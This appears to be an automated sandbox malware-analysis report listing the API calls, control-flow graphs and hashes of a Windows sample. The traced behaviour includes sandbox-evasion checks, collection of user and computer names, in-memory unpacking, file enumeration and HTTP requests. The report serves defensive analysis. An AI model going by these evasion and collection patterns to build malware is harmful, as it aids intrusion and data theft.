                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00764A28), ref: 004199C5
                                            • Part of subcall function 00419860: GetProcAddress.KERNEL32(75900000,00792B90), ref: 004199DE
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                            • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                            • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                            • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                            • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                            • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                            • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                            • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                            • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                            • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                          • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                            • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00792F70,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                          • Sleep.KERNEL32(00001770), ref: 00416B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00792F70,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                          • ExitProcess.KERNEL32 ref: 00416B22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                          • String ID: p/y
                                          • API String ID: 3511611419-2423603383
                                          • Opcode ID: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                          • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                          • Opcode Fuzzy Hash: f2837a91539e1de850f1597d3128a2fe060ecc5e52c57b00c57f058d9a125bb9
                                          • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1400 22c003c-22c0047 1401 22c004c-22c0263 call 22c0a3f call 22c0e0f call 22c0d90 VirtualAlloc 1400->1401 1402 22c0049 1400->1402 1417 22c028b-22c0292 1401->1417 1418 22c0265-22c0289 call 22c0a69 1401->1418 1402->1401 1420 22c02a1-22c02b0 1417->1420 1421 22c02ce-22c03c2 VirtualProtect call 22c0cce call 22c0ce7 1418->1421 1420->1421 1422 22c02b2-22c02cc 1420->1422 1429 22c03d1-22c03e0 1421->1429 1422->1420 1430 22c0439-22c04b8 VirtualFree 1429->1430 1431 22c03e2-22c0437 call 22c0ce7 1429->1431 1433 22c04be-22c04cd 1430->1433 1434 22c05f4-22c05fe 1430->1434 1431->1429 1438 22c04d3-22c04dd 1433->1438 1435 22c077f-22c0789 1434->1435 1436 22c0604-22c060d 1434->1436 1441 22c078b-22c07a3 1435->1441 1442 22c07a6-22c07b0 1435->1442 1436->1435 1439 22c0613-22c0637 1436->1439 1438->1434 1443 22c04e3-22c0505 LoadLibraryA 1438->1443 1448 22c063e-22c0648 1439->1448 1441->1442 1444 22c086e-22c08be LoadLibraryA 1442->1444 1445 22c07b6-22c07cb 1442->1445 1446 22c0517-22c0520 1443->1446 1447 22c0507-22c0515 1443->1447 1456 22c08c7-22c08f9 1444->1456 1449 22c07d2-22c07d5 1445->1449 1450 22c0526-22c0547 1446->1450 1447->1450 1448->1435 1451 22c064e-22c065a 1448->1451 1452 22c0824-22c0833 1449->1452 1453 22c07d7-22c07e0 1449->1453 1454 22c054d-22c0550 1450->1454 1451->1435 1455 22c0660-22c066a 1451->1455 1462 22c0839-22c083c 1452->1462 1457 22c07e4-22c0822 1453->1457 1458 22c07e2 1453->1458 1459 22c0556-22c056b 1454->1459 1460 22c05e0-22c05ef 1454->1460 1461 22c067a-22c0689 1455->1461 1463 22c08fb-22c0901 1456->1463 1464 22c0902-22c091d 1456->1464 1457->1449 1458->1452 1465 22c056d 1459->1465 1466 22c056f-22c057a 1459->1466 1460->1438 1467 22c068f-22c06b2 1461->1467 1468 22c0750-22c077a 1461->1468 1462->1444 1469 22c083e-22c0847 1462->1469 1463->1464 1465->1460 1471 22c057c-22c0599 1466->1471 1472 22c059b-22c05bb 1466->1472 1473 22c06ef-22c06fc 1467->1473 1474 22c06b4-22c06ed 1467->1474 1468->1448 1475 22c0849 1469->1475 1476 22c084b-22c086c 1469->1476 1483 22c05bd-22c05db 1471->1483 1472->1483 1477 22c06fe-22c0748 1473->1477 1478 22c074b 1473->1478 1474->1473 1475->1444 1476->1462 1477->1478 1478->1461 1483->1454
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 022C024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 943396e53f6403ba4b32324193a8bb756bb201c4b4056bf6a3ac91a22291b886
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 49526A74A11229DFDB64CF98C984BACBBB1BF09304F1481E9E54DAB355DB30AA85CF14

                                          Control-flow Graph

                                          APIs
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                          • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                          • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ??2@$CrackInternetlstrlen
                                          • String ID: <
                                          • API String ID: 1683549937-4251816714
                                          • Opcode ID: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                          • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                          • Opcode Fuzzy Hash: 5e0eba31b208d9ca9ca69f5ca1b4b8635b9982c67c18271d081340b0a416118e
                                          • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1500 401287 1499->1500 1501 40129a-40129d 1499->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                                          APIs
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                          • __aulldiv.LIBCMT ref: 00401258
                                          • __aulldiv.LIBCMT ref: 00401266
                                          • ExitProcess.KERNEL32 ref: 00401294
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                          • String ID: @
                                          • API String ID: 3404098578-2766056989
                                          • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                          • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                          • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D
                                          APIs
                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00792F70,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                          • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                          • Sleep.KERNEL32(00001770), ref: 00416B04
                                          • CloseHandle.KERNEL32(?,00000000,?,00792F70,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                          • ExitProcess.KERNEL32 ref: 00416B22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                          • String ID:
                                          • API String ID: 941982115-0
                                          • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                          • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                          • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                          • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                          APIs
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                            • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0079B138), ref: 00406303
                                            • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                            • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0079ABA0,00000000,00000000,00400100,00000000), ref: 00406385
                                            • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                            • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                          • String ID: ERROR$ERROR
                                          • API String ID: 3287882509-2579291623
                                          • Opcode ID: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                          • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                          • Opcode Fuzzy Hash: 59c2f712046978f996f1235e97a4a9c2f26ee25370e317b3bcc87c900f09e2b2
                                          • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                          APIs
                                            • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                            • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                            • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                            • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                            • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                            • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                          • ExitProcess.KERNEL32 ref: 004011C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Process$AllocName$ComputerExitUser
                                          • String ID: @.y$p/y
                                          • API String ID: 1004333139-1348988211
                                          • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                          • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                                          • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                                          • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                          • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                          • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocComputerNameProcess
                                          • String ID:
                                          • API String ID: 4203777966-0
                                          • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                          • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                          • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                          • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                          • ExitProcess.KERNEL32 ref: 00401143
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$AllocCurrentExitNumaVirtual
                                          • String ID:
                                          • API String ID: 1103761159-0
                                          • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                          • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                          • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                          • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00769FF6
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0076A016
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, Offset: 00769000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_769000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 3bbe555f928dd92594042d93c4e03499a2b4338ff360fa18180512d8aadbd8c6
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 7FF096321007117BD7203BF5988DBAEB6ECAF49725F100529EA47E10C0EBB8EC454A61
                                          APIs
                                          • SetErrorMode.KERNEL32(00000400,?,?,022C0223,?,?), ref: 022C0E19
                                          • SetErrorMode.KERNEL32(00000000,?,?,022C0223,?,?), ref: 022C0E1E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction ID: e9eebe65464639068eaa2685cf01862f011838b8cdadc55a51611b4f7e81d4a0
                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                          • Instruction Fuzzy Hash: BFD01231155129B7D7003AD4DC09BCD7B1CDF09B66F108011FB0DD9080C770964046E5
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                          • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                                          • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                                          • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00769CDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338357081.0000000000769000.00000040.00000020.00020000.00000000.sdmp, Offset: 00769000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_769000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: cf9aede9e1be65fd4f904b0b23e4907e43b4c5453c0415338161ea393d01c532
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 57113F79A00208EFDB01DF98C985E98BBF5EF08351F1580A4FA489B362D375EA50DF80
                                          APIs
                                          • wsprintfA.USER32 ref: 004138CC
                                          • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                                          • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                          • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                          • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                          • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                          • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*$p0y
                                          • API String ID: 1125553467-2659028581
                                          • Opcode ID: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                          • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                                          • Opcode Fuzzy Hash: 147e69476bc17354b056f5ce00ba28a25639a4ba897131371b79271fd6134482
                                          • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
